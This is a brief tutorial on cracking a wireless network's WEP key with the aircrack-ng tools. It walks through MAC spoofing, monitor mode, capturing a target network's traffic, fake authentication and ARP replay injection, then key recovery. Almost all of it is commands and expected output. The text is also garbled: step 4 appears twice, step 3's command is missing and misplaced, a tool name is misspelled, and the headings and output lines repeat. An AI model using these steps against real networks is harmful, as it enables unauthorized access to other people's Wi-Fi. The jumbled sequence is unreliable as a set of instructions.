Preparation
1. Stop the wireless adapter (wlan0):
airmon-ng stop wlan0
2. Change the MAC address:
macchanger --mac 00:11:22:33:44:55 wlan0
3. Start the wireless adapter:
airmon-ng start wlan0
This will create a mon0 interface that is used from now on.
Attack
1. Identify the MAC address (BSSID), channel (CH) and name (ESSID) of the target network:
airodump-ng mon0
2. Start the packet capture:
airodump-ng -c [channel] -w /tmp/capture --bssid [bssid] mon0
3. Associate with the AP (in another terminal window):
If this succeeds, you should see something like:
4. Start injecting packets to speed things up (in another terminal window):
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] mon0
If this succeeds, you should see something like:
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)
4. Start injecting packets to speed things up (in another terminal window):
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 mon0
Check the packet capture window, the #Data field should be increasing now. Once enough packets are captured you can proceed to cracking the key. You should run the cracking in parallel with the packet capturing, that way you can just keep gathering data if the cracking process fails and try again later. I run the cracking command every 10k IVs starting at 20k IVs.
Cracking
Cracking
Attempt to crack the key:
If cracking fails, try running it after you've capture 10k more packets.
aircrack-ng -n 128 -b [bssid]
/tmp/capture-01.cap
If cracking fails, try running it after you've capture 10k more packets.